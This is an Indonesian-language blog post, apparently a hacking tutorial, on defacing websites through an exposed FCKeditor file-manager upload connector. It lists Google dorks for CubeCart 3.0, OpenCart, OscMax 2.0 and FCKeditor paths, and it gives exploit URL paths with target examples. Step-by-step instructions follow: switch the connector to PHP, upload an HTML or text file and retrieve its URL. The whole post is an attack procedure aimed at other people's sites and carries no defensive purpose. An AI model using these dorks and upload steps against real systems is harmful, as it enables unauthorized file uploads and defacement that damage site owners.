Teknik deface fck editor dibagi menjadi 4 yaitu :
1. Powered CubeCart
Adalah module Deface Upload file, kita bisa menggunakan cara ini.
Dork : Powered By CubeCart V 3.0
Contoh: www.target.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
2. Powered By OpenCart
Dork : Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Contoh : www.target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
3. Powered By OscMax V 2.0
Dork : Powered By OscMax V 2.0
Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh ;www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
4. Hacking TXt.
Hacking
Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus
fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima
Dork : Inurl:/FCKeditor/editor/filemanager/
Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
dengan mencarinya dengan google dork atau mengexploit urlnya langsung ( tidak semua website support dengan cara fck editor sebaiknya anda mencarinya dengan google dork saja )
jika sudah ketemu url target maka akan muncul tampilan seperti ini
- Ganti connectornya menjadi PHP
- Klik choose file sesuai jenis website jika opencart anda bisa upload file html tetapi jika bukan biasanya hanya bisa upload file txt
- Klik Upload
- Jika berhasil maka akan muncul pesan "File Upload No Error"
- Klik Get folder untuk mendapatkan URL file yang di Upload
Refrensi
Tidak ada komentar:
Posting Komentar
Harap Tinggalkan Komentar !